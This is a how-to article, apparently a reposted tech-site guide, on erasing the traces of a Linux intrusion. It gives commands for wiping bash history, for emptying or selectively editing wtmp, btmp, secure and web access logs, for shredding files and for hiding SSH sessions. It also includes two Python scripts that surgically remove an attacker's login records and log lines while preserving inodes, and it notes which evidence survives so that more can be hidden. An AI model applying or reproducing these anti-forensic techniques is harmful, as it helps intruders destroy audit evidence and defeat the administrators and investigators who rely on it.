2025-02-24 Update From: SLTechnology News&Howtos > Servers
Shulou (Shulou.com) 05/31 Report
This article explains how the traces of a Linux intrusion are cleaned up: shell history, system logs, web server logs, file contents on disk, and SSH login records. The methods are simple and quick to apply; each one is given with the command that does it and the places where a trace still survives.
01. Clear the history command record
The first way:
(1) Edit the history file and delete the commands you do not want kept:
vim ~/.bash_history
(2) Clear the history of the current shell session:
history -c
Note that bash writes its in-memory history list back to HISTFILE when the session exits (overwriting the file unless histappend is set), so an edit to ~/.bash_history alone is undone at logout. After editing, run history -c followed by history -r so the in-memory list matches the edited file, or unset HISTFILE so nothing is written at exit.
The second way:
(1) Use vim's split-screen feature to delete history commands:
vi test.txt            # open any file in vim
:set history=0         # vim keeps its own command history in the viminfo file; this stops it recording
:vsp ~/.bash_history   # open the history file in a vertical split, delete the lines you want gone and save with :w
(2) Run commands from inside vim that you do not want others to see:
:set history=0
:!command
The third way:
Edit the configuration file /etc/profile so the system no longer saves command records at all:
HISTSIZE=0
This applies to every user's login shell, so history stops being recorded system-wide, which an administrator who relies on it will notice.
The fourth way:
After logging in, run the following so that nothing from this session is written to .bash_history:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
Of these, only HISTFILE, HISTSIZE and HISTFILESIZE mean anything to bash; the others are unset harmlessly. This affects the current session only: entries that earlier sessions already wrote to disk stay there.
02. Clear traces in the system logs
A Linux system keeps many log files that record what happens while it runs. The ones that record logins are:
/var/log/btmp      every failed login; read with lastb
/var/log/lastlog   the last login time of every user; read with lastlog
/var/log/wtmp      every login and logout; read with last
/var/run/utmp      the users currently logged in (older texts give /var/log/utmp; on current distributions it lives under /var/run or /run); read with w, who and users
/var/log/secure    security and authentication messages (Debian-style systems keep the same data in /var/log/auth.log)
/var/log/messages  system startup messages and general error logs
The first way: empty the log files
Clear the record of failed logins:
[root@centos]# echo > /var/log/btmp
[root@centos]# lastb    // login failures can no longer be queried
Clear the record of successful logins:
[root@centos]# echo > /var/log/wtmp
[root@centos]# last     // successful logins can no longer be queried
Clear the related log information:
echo > /var/log/lastlog            # clears the last login times shown by lastlog
echo > /var/run/utmp               # clears the currently logged-in users shown by w, who and users
cat /dev/null > /var/log/secure    # clears the security log
cat /dev/null > /var/log/messages  # clears the system log
Note that echo > leaves a single newline in the file rather than an empty file; for a binary file such as wtmp that is a stray partial record, so prefer : > file or cat /dev/null > file, which truncate to zero bytes. An empty wtmp or utmp on a machine that has clearly been in use is itself a sign of tampering.
The second way: delete or replace part of the log
Emptying a log file outright is easy for an administrator to spot. Deleting or replacing only the key entries hides the attack traces far better, although not perfectly.
# Delete every line that contains a string, e.g. your own login IP:
sed -i '/your own ip/d' /var/log/messages
# Or replace your login IP globally with another address, e.g. 192.168.166.85 -> 192.168.1.1:
sed -i 's/192.168.166.85/192.168.1.1/g' /var/log/secure
In a sed regex an unescaped dot matches any character, and neither command anchors the address, so they also hit longer addresses that contain it (192.168.1.1 matches inside 192.168.1.10); escape the dots and use \b anchors. Either way the file's modification time changes, and a copy already shipped to journald or a remote syslog server is untouched.
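The first way above empties wtmp with echo >, and the second way uses sed, which only works on text. wtmp, btmp and utmp are arrays of fixed-size binary struct utmp records, so the selective approach needs a parser. The following is an added example, not code from the original article: it parses such records and drops one host's login sessions together with their matching logout records. It assumes the glibc layout on x86_64 (384 bytes per record); the sample records are constructed for the example, and the function names are this example's own.

```python
"""Added example (not from the original article): parse wtmp/btmp records
and drop one host's sessions instead of truncating the whole file.

Record layout assumed here: glibc on x86_64, 384 bytes per record. The
sample records built by build_sample_wtmp() are constructed for this example."""
import struct

# struct utmp (glibc, x86_64): ut_type, 2 pad bytes, ut_pid, ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], ut_exit (two shorts), ut_session,
# ut_tv.tv_sec, ut_tv.tv_usec (32-bit each), ut_addr_v6 (16 bytes), 20 unused bytes.
UTMP = struct.Struct("<h2xi32s4s32s256shhiii16s20x")
RECORD = UTMP.size  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def c_string(raw):
    """Decode a NUL-padded fixed-size field."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one record. ut_addr_v6 is left zero here; a real entry also
    carries the binary address, which must stay consistent with ut_host."""
    return UTMP.pack(ut_type, pid, line.encode(), line.encode()[-4:],
                     user.encode(), host.encode(), 0, 0, 0, tv_sec, 0, b"")


def build_sample_wtmp():
    """Constructed sample: two root logins from 192.168.1.1 interleaved with other users."""
    return b"".join([
        pack_record(USER_PROCESS, 1201, "pts/0", "root", "192.168.1.1", 1704877201),
        pack_record(USER_PROCESS, 1202, "pts/1", "alice", "192.168.1.10", 1704877205),
        pack_record(DEAD_PROCESS, 1201, "pts/0", "", "", 1704877500),   # root's logout
        pack_record(USER_PROCESS, 1204, "pts/2", "bob", "192.168.1.100", 1704877600),
        pack_record(DEAD_PROCESS, 1202, "pts/1", "", "", 1704877700),   # alice's logout
    ])


def parse_records(buf):
    """Decode every record into a dict; this is also what last(1) walks."""
    if len(buf) % RECORD:
        raise ValueError("file size is not a multiple of the record size")
    out = []
    for off in range(0, len(buf), RECORD):
        t, pid, line, _id, user, host, _term, _exit, _sess, sec, _usec, _addr = UTMP.unpack_from(buf, off)
        out.append({"type": t, "pid": pid, "line": c_string(line),
                    "user": c_string(user), "host": c_string(host), "time": sec})
    return out


def drop_sessions(buf, host):
    """Remove login records from host together with the matching logout.
    The logout is a DEAD_PROCESS record with empty user and host on the same
    ut_line, so matching on host alone would leave a dangling logout that
    last(1) reports as a session with no login. Returns (new_bytes, removed)."""
    keep = bytearray()
    open_lines = set()
    removed = 0
    for off in range(0, len(buf), RECORD):
        rec = buf[off:off + RECORD]
        t, _pid, line, _id, _user, rec_host, *_ = UTMP.unpack(rec)
        line, rec_host = c_string(line), c_string(rec_host)
        if t == USER_PROCESS and rec_host == host:
            open_lines.add(line)
            removed += 1
            continue
        if t == DEAD_PROCESS and line in open_lines:
            open_lines.discard(line)
            removed += 1
            continue
        keep += rec
    return bytes(keep), removed


if __name__ == "__main__":
    edited, n = drop_sessions(build_sample_wtmp(), "192.168.1.1")
    print("removed", n, "records; remaining:")
    for r in parse_records(edited):
        print(r)
```

Write the result back by truncating the existing file in place rather than replacing it, so the inode stays the same, and check the edit with last -f on a copy. What survives this edit: the timestamp of the first remaining record (the "wtmp begins" line of last), the same host in btmp if any attempts failed, lastlog, and sshd's own "Accepted ..." line in the security log and the journal.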
03. Clear traces of a web intrusion
The first way: replace the IP address in the log directly
sed -i 's/192.168.166.85/192.168.1.1/g' access.log
The second way: remove the related lines
# use grep -v to drop the lines that mention our activity
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
# write the edited log back over the original file
cat tmp.log > /var/log/nginx/access.log
Writing back with cat > keeps the original inode, owner and permissions, which mv tmp.log would not; delete tmp.log afterwards. nginx's error.log, rotated copies of access.log, and any upstream proxy or WAF hold their own records of the same requests.
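The sed and grep commands in sections 02 and 03 match the address as a bare substring with the dots unescaped, so a replacement of 192.168.1.1 also rewrites 192.168.1.10 and 192.168.1.100. The following is an added example, not code from the original article: it shows the substring problem next to a version that matches the address only as a whole token, removes lines by IP or by a literal such as evil.php, and writes the result back over the same file. The sample log lines are constructed, and the function names are this example's own.

```python
"""Added example (not from the original article): anchored IP scrubbing of
text logs, exercised on constructed sample lines."""
import os
import re
import tempfile

# Constructed sample lines for this example (not real log data).
SAMPLE_MESSAGES = [
    "Jan 10 09:00:01 host sshd[1201]: Accepted password for root from 192.168.1.1 port 50012 ssh2",
    "Jan 10 09:00:05 host sshd[1202]: Accepted password for alice from 192.168.1.10 port 50013 ssh2",
    "Jan 10 09:01:12 host sshd[1203]: Failed password for root from 192.168.1.1 port 50020 ssh2",
    "Jan 10 09:02:33 host sshd[1204]: Accepted publickey for bob from 192.168.1.100 port 50031 ssh2",
    "Jan 10 09:03:00 host sudo: alice : TTY=pts/0 ; USER=root ; COMMAND=/bin/ls",
]
SAMPLE_ACCESS = [
    '192.168.1.1 - - [10/Jan/2024:09:05:10 +0000] "GET /evil.php?cmd=id HTTP/1.1" 200 51 "-" "curl/8.0"',
    '192.168.1.10 - - [10/Jan/2024:09:05:11 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.168.1.1 - - [10/Jan/2024:09:05:12 +0000] "GET /logo.png HTTP/1.1" 200 2048 "-" "curl/8.0"',
]


def ip_token(ip):
    """Regex that matches ip only when it is not part of a longer dotted number."""
    return re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])")


def naive_replace(lines, old, new):
    """What the article's sed does: an unescaped, unanchored pattern."""
    return [re.sub(old, new, line) for line in lines]


def replace_ip(lines, old, new):
    """Rewrite old -> new only where old is a whole IP token."""
    pat = ip_token(old)
    return [pat.sub(new, line) for line in lines]


def drop_lines(lines, ip=None, needle=None):
    """Return the lines that mention neither ip (as a whole token) nor the literal needle."""
    pat = ip_token(ip) if ip else None
    keep = []
    for line in lines:
        if pat is not None and pat.search(line):
            continue
        if needle is not None and needle in line:
            continue
        keep.append(line)
    return keep


def rewrite_in_place(path, lines):
    """Truncate and rewrite path rather than replacing it, so the inode, owner
    and mode stay the same; mtime and ctime still change, and copies already
    shipped to journald or a remote syslog server are untouched."""
    with open(path, "r+", encoding="utf-8") as f:
        f.seek(0)
        f.truncate()
        f.write("".join(line + "\n" for line in lines))


def scrub_file_demo(attacker_ip="192.168.1.1"):
    """Round trip on a temporary file; returns what a checker would compare."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        with open(path, "w", encoding="utf-8") as f:
            f.write("".join(line + "\n" for line in SAMPLE_MESSAGES))
        inode_before = os.stat(path).st_ino
        rewrite_in_place(path, drop_lines(SAMPLE_MESSAGES, ip=attacker_ip))
        with open(path, encoding="utf-8") as f:
            remaining = f.read().splitlines()
        return {"same_inode": os.stat(path).st_ino == inode_before, "remaining": remaining}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for line in naive_replace(SAMPLE_MESSAGES, "192.168.1.1", "10.0.0.7"):
        print("naive   :", line)   # alice's 192.168.1.10 becomes 10.0.0.70
    for line in replace_ip(SAMPLE_MESSAGES, "192.168.1.1", "10.0.0.7"):
        print("anchored:", line)
    print(scrub_file_demo())
```

The naive form turns alice's 192.168.1.10 into 10.0.0.70 and bob's 192.168.1.100 into 10.0.0.700, addresses that appear nowhere else in the log and that a reviewer correlating with the web server or firewall logs will not be able to match.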
04. Secure file deletion tools
(1) shred command
Overwrites the file's data on disk so it cannot be recovered; 3 overwrite passes by default, with -n setting the number of passes, -z adding a final pass of zeros, -u removing the file afterwards, -f forcing write permission and -v printing progress.
[root@centos]# shred -f -u -z -v -n 8 1.txt
shred: 1.txt: pass 1/9 (random)...
shred: 1.txt: pass 2/9 (ffffff)...
shred: 1.txt: pass 3/9 (aaaaaa)...
shred: 1.txt: pass 4/9 (random)...
shred: 1.txt: pass 5/9 (000000)...
shred: 1.txt: pass 6/9 (random)...
shred: 1.txt: pass 7/9 (555555)...
shred: 1.txt: pass 8/9 (random)...
shred: 1.txt: pass 9/9 (000000)...
shred: 1.txt: removing
shred: 1.txt: renamed to 00000
shred: 00000: renamed to 0000
shred: 0000: renamed to 000
shred: 000: renamed to 00
shred: 00: renamed to 0
shred: 1.txt: removed
(2) dd command
Can be used to overwrite a file, a partition or a whole disk with zeros:
dd if=/dev/zero of=<file or device to wipe> bs=<block size> count=<number of blocks>
For a file, bs multiplied by count must be at least the file's size; remove the file afterwards with rm.
(3) wipe
wipe writes special patterns over a file repeatedly so that it is securely erased from magnetic media:
wipe filename
(4) Secure-Delete
Secure-Delete is a collection of four command-line tools for secure deletion: srm, smem, sfill and sswap.
srm filename       # securely delete a file
sfill /directory   # wipe the free space of the filesystem that holds the directory
sswap /dev/sda1    # wipe a swap partition (run swapoff on it first)
smem               # wipe free memory
All four tools, like shred, dd and wipe, overwrite in place and assume the filesystem writes new data to the same blocks. On journaling filesystems in data=journal mode, copy-on-write filesystems such as btrfs, snapshots, RAID, and SSDs with wear levelling, old copies of the data can survive; the shred man page carries the same warning.
05. Hide remote SSH login records
A login made this way is not shown by w, who, last and similar commands:
ssh -T root@192.168.0.1 /bin/bash -i
-T disables pseudo-terminal allocation, and sshd only writes a utmp/wtmp entry for sessions that get a pty, so the session never appears in those files. sshd still logs the authentication itself to /var/log/secure (or auth.log) and the journal, and the open connection is visible to ss and netstat.
Do not record the server's host key in the local ~/.ssh/known_hosts:
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i